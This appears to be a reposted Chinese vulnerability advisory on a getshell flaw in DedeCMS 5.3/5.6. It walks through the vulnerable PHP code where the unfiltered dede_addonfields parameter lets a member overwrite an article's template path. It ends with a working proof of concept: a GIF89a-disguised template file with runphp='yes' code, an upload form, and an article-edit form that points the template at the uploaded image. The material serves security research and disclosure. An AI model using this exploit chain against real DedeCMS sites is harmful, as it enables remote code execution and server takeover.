DEDECMS网站管理系统Get Shell漏洞

漏洞版本:

DEDECMS 5.3/5.6

漏洞描述:

DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目前已经有超过二十万个站点正在使用DedeCms或居于 DedeCms核心,是目前国内应用最广泛的php类CMS系统。



article_add.php

 



   1. ........................  

   2. else if($dopost=='save')  

   3. {  

   4. include(DEDEMEMBER.'/inc/archives_check.php');  

   5.   

   6. //分析处理附加表数据  

   7. $inadd_f = $inadd_v = '';  

   8. if(!emptyempty($dede_addonfields))  

   9. {  

  10.    $addonfields = explode(';',$dede_addonfields);  

  11. ............................................ //省略部份代码  

  12.      $inadd_f .= ','.$vs[0];  

  13.      $inadd_v .= " ,'".${$vs[0]}."' ";  

  14.     }  

  15.    }  

  16. }  

  17. ..........................................  

  18. $addtable = trim($cInfos['addtable']);  

  19. if(emptyempty($addtable))  

  20. {  

  21.    ......................................  

  22. }  

  23. else  

  24. {  

  25.    $inquery = "INSERT INTO `{$addtable}`(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";  

  26.    if(!$dsql->ExecuteNoneQuery($inquery))  

  27.    {  

  28. ..........................................  

  29.    }  

  30. }  

  31. ..........................................  

  32. $artUrl = MakeArt($arcID,true);     //利用地方(arc.archives.functions.php有定义)  

  33.   

  34.   

  35. function MakeArt($aid,$ismakesign=false)  

  36. {  

  37. global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;  

  38. include_once(DEDEINC.'/arc.archives.class.php');  

  39. if($ismakesign)  

  40. {  

  41.    $envs['makesign'] = 'yes';  

  42. }  

  43. $arc = new Archives($aid);  

  44. $reurl = $arc->MakeHtml();           //arc.archives.class.php有定义  

  45. ............................  

  46. }  



arc.archives.class.php

 



   1. class Archives  

   2. {  

   3. ................  

   4. function __construct($aid)  

   5. {  

   6. ............  

   7.    if($this->ChannelUnit->ChannelInfos['addtable']!='')  

   8.     {  

   9.      $query = "SELECT * FROM `{$this->ChannelUnit->ChannelInfos['addtable']}` WHERE `aid` = '$aid'";  

  10.      $this->addTableRow = $this->dsql->GetOne($query);  

  11.     }  

  12. ........................  

  13. if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)  

  14.     {  

  15.      if(is_array($this->addTableRow))  

  16.      {  

  17.      ...............................  

  18.       $this->Fields['templet'] = $this->addTableRow['templet'];//注意1  

  19.      ......................................  

  20.      }  

  21.     }  

  22.     .............................  

  23. }  

  24.   

  25. function MakeHtml($isremote=0)  

  26. {  

  27.    global $cfg_remote_site,$fileFirst;  

  28.    if($this->IsError)  

  29.    {  

  30.     return '';  

  31.    }  

  32.    $this->Fields["displaytype"] = "st";  

  33.    //预编译$th  

  34.    $this->LoadTemplet();              //触发1  

  35.     

  36. ......................................//省略部份代码  

  37.      $this->ParseDMFields($i,1);  

  38.    $this->dtp->SaveTo($truefilename); //触发2  

  39. ......................................  

  40. }  

  41. 继续跟(触发1)$this->LoadTemplet();        //arc.archives.class.php有定义  

  42.   

  43. function LoadTemplet()  

  44. {  

  45.    if($this->TempSource=='')  

  46.    {  

  47.     $tempfile = $this->GetTempletFile();                     //注意2  

  48.     if(!file_exists($tempfile) || !is_file($tempfile))  

  49.     {  

  50.      echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}<br />";  

  51.      echo "模板文件不存在,无法解析文档!";  

  52.      exit();  

  53.     }  

  54.     $this->dtp->LoadTemplate($tempfile);                  //触发3  

  55.     $this->TempSource = $this->dtp->SourceString;  

  56.    }  

  57.    else  

  58.    {  

  59.     $this->dtp->LoadSource($this->TempSource);  

  60.    }  

  61. }  

  62.   

  63. 看注意2 的$this->GetTempletFile()           //arc.archives.class.php有定义  

  64.   

  65. function GetTempletFile()  

  66. {  

  67.    global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;  

  68.    $cid = $this->ChannelUnit->ChannelInfos['nid'];  

  69.    if(!emptyempty($this->Fields['templet']))                  //注意3  

  70.    {  

  71.     $filetag = MfTemplet($this->Fields['templet']);  

  72.     if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;  

  73.    }  

  74.    else  

  75.    {  

  76.     $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);  

  77.    }  

  78. .......................................  

  79.    if($cid=='spec')  

  80.    {  

  81.     if( !emptyempty($this->Fields['templet']) )  

  82.     {  

  83.      $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;  

  84.     }  

  85.     else  

  86.     {  

  87.      $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";  

  88.     }  

  89.    }  

  90. ...........................................  

  91.      return $tmpfile;  

  92. }  



注意3中的值来自注意1是通过查表得来的,控制了它就等于控制了任意模板,然后通过触发3来触发漏洞

看下怎么控制注意1的值

article_edit.php

 



   1. ......................  

   2. else if($dopost=='save')  

   3. { ....................  

   4. if(!emptyempty($dede_addonfields))  

   5. {  

   6.    $addonfields = explode(';',$dede_addonfields);  

   7.    if(is_array($addonfields))  

   8.    {  

   9. ........................  

  10.              ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);  

  11.      $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";  

  12.       

  13.    }  

  14. }  

  15. ...................  

  16. if($addtable!='')  

  17. {  

  18.    $upQuery = "Update `$addtable` set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";  

  19.    if(!$dsql->ExecuteNoneQuery($upQuery))  

  20.    {..............  

  21.    }  

  22. }  

  23. ....................  

  24. }  



$dede_addonfields没有过滤,我们可以构造$inadd_f为,templet='上传的模板图片地址',包含我们的图片后,再通过触发2来生成图片里的后门!

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. Gif89a{dede:field name='toby57' runphp='yes'}
    2. phpinfo();
    3. {/dede:field}
    4. 保存为1.gif
    5.  
    6. 1. <form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
    7. 2.<input type="hidden" name="aid" value="7"/>
    8. 3.<input type="hidden" name="mediatype" value="1"/>
    9. 4.<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif"/></br>
    10. 5.<input type="hidden" name="dopost" value="save"/>
    11. 6.<input name="title" type="hidden" id="title" value="1.jpg"class="intxt"/>
    12. 7.<input name="addonfile" type="file" id="addonfile"/>
    13. 8.<button class="button2" type="submit">更改</button>
    14. 9.</form>
    15.  
    16. 构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
    17. 发表文章,然后构造修改表单如下:
    18.  
    19. 1.<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
    20. 2.<input type="hidden" name="dopost" value="save"/>
    21. 3.<input type="hidden" name="aid" value="2"/>
    22. 4.<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd"/>
    23. 5.<input type="hidden" name="channelid" value="1"/>
    24. 6.<input type="hidden" name="oldlitpic" value=""/>
    25. 7.<input type="hidden" name="sortrank" value="1282049150"/>
    26. 8.<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100"class="intxt"/>
    27. 9.<input type="text" name="writer" id="writer" value="123456" maxlength="100"class="intxt" style="width:219px"/>
    28. 10.<select name='typeid' size='1'>
    29. 11.<option value='1'class='option3' selected=''>Test</option>
    30. 12. <select name='mtypesid' size='1'>
    31. 13. <option value='0' selected>请选择分类...</option>
    32. 14.<option value='1'class='option3' selected>aa</option></select>
    33. 15.<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
    34. 16. <input type='hidden' name='dede_addonfields' value="templet">
    35. 17. <input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
    36. 18. <input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
    37. 19. <button class="button2" type="submit">提交</button>
    38. 20. </form>

你可能感兴趣的:(dedecms)